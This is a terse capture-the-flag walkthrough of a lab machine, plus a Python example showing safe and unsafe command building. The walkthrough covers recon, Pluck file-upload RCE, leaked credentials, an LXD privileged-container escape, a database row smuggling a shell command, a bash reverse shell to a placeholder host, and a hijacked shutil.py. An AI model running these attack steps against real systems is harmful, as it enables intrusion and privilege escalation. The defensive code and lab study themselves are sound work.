Nmap -
> nmap -sVC -T4 10.10.251.54 -oN scans/nmap_initial
# Nmap 7.94 scan initiated Sat Nov 18 14:29:16 2023 as: nmap -v -sC -T4 -sV -oN scans/nmap_initial 10.10.251.54
Nmap scan report for 10.10.251.54
Host is up (0.17s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 76:26:67:a6:b0:08:0e:ed:34:58:5b:4e:77:45:92:57 (RSA)
| 256 52:3a:ad:26:7f:6e:3f:23:f9:e4:ef:e8:5a:c8:42:5c (ECDSA)
|_ 256 71:df:6e:81:f0:80:79:71:a8:da:2e:1e:56:c4:de:bb (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
| http-methods:
|_ Supported Methods: HEAD GET POST OPTIONS
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Nov 18 14:30:06 2023 -- 1 IP address (1 host up) scanned in 50.69 seconds
Gobuster (dir fuzz output) -
> gobuster dir -u http://10.10.251.54 -w /usr/share/dirb/wordlists/common.txt -t 20 -o gobust.log
/app (Status: 301) [Size: 310] [--> http://10.10.251.54/app/]
Pluck 4.7.13 -> file upload RCE via an uploaded shell.phar
http://10.10.250.141/app/pluck-4.7.13/login.php
admin:password
http://10.10.250.141/app/pluck-4.7.13/files/shell.phar
www-data -> lucien
cd /opt
cat test.py
lucien:HeyLucien#@1999!
Group lxd - unintended path
On your machine:
git clone https://github.com/saghul/lxd-alpine-builder
cd lxd-alpine-builder
sed -i 's,yaml_path="latest-stable/releases/$apk_arch/latest-releases.yaml",yaml_path="v3.8/releases/$apk_arch/latest-releases.yaml",' build-alpine
sudo ./build-alpine -a i686
python3 -m http.server 80
- Start a Python web server and transfer the Alpine image to the box:
cd /dev/shm; wget <tun0-ip>/alpine-v3.8-i686-20231118_1500.tar.gz
lxd init
lxc image import ./alpine*.tar.gz --alias voldemort
lxc init voldemort hogwarts -c security.privileged=true
lxc config device add hogwarts hogwarts disk source=/home/ path=/mnt/home recursive=true
lxc start hogwarts
lxc exec hogwarts /bin/sh
cd /mnt/home
Intended path - shell history reveals lucien's MySQL creds
mysql -u lucien -p'lucien42DBPASSWORD'
use information_schema;
select * from USER_PRIVILEGES;
- lucien has INSERT/UPDATE privileges on the database
mysql> use library;
mysql> select * from dreams;
+---------+------------------------------------+
| dreamer | dream |
+---------+------------------------------------+
| Alice | Flying in the sky |
| Bob | Exploring ancient ruins |
| Carol | Becoming a successful entrepreneur |
| Dave | Becoming a professional musician |
+---------+------------------------------------+
4 rows in set (0.00 sec)
mysql> Insert into dreams (dreamer,dream) Values ('vold;/tmp/voldemort','n00b');
mysql> exit
cat << EOF > /tmp/voldemort
#!/bin/bash
/bin/bash -c '/bin/bash -i >& /dev/tcp/<tun0-ip>/1337 0>&1'
EOF
sudo -u death python3 /home/death/getDreams.py
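The inserted row 'vold;/tmp/voldemort' only executes /tmp/voldemort because the script hands table values to a shell. As an added example (not the box's getDreams.py, whose source is not on the page), the assumed vulnerable string-building pattern next to two hardened forms and a row audit a defender can run over the table; the sample rows are constructed from the output above.

```python
import re
import shlex
from typing import Iterable

# Constructed rows mirroring the dreams table on the page, plus the injected row.
SAMPLE_ROWS = [
    ("Alice", "Flying in the sky"),
    ("Bob", "Exploring ancient ruins"),
    ("vold;/tmp/voldemort", "n00b"),  # the row the writeup inserts
]

# Characters the shell treats as syntax; any of them inside a column value
# changes the meaning of a command assembled by string formatting.
SHELL_META = set(";|&$`<>()\n\"'\\")

def build_command_unsafe(dreamer: str, dream: str) -> str:
    """Hypothetical vulnerable pattern: column values pasted into a shell string.
    Passed to os.system()/shell=True, 'vold;/tmp/voldemort' runs /tmp/voldemort."""
    return f"echo {dreamer} dreams of {dream}"

def build_argv_safe(dreamer: str, dream: str) -> list:
    """Hardened: an argv list for subprocess.run(..., shell=False). Each value
    is exactly one argument and is never parsed by a shell."""
    return ["echo", dreamer, "dreams", "of", dream]

def build_command_quoted(dreamer: str, dream: str) -> str:
    """If a shell string is unavoidable, shlex.quote turns each value into a literal."""
    return f"echo {shlex.quote(dreamer)} dreams of {shlex.quote(dream)}"

_PLAIN = re.compile(r"^[A-Za-z0-9 ,.-]{1,64}$")

def validate_field(value: str) -> bool:
    """Allow-list: letters, digits, spaces and basic punctuation only."""
    return _PLAIN.fullmatch(value) is not None

def audit_rows(rows: Iterable[tuple]) -> list:
    """Return dreamer names whose row fails the allow-list or carries shell
    metacharacters; run over the table as a tripwire before any command uses it."""
    flagged = []
    for dreamer, dream in rows:
        tainted = any(c in SHELL_META for c in dreamer + dream)
        if tainted or not (validate_field(dreamer) and validate_field(dream)):
            flagged.append(dreamer)
    return flagged
```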
Edit /usr/lib/python3.8/shutil.py (the death user has write permission on it) and add the following inside the copy2() function:
os.system("chmod +rwx /home/morpheus/morpheus_flag.txt")
Thanks for reading <3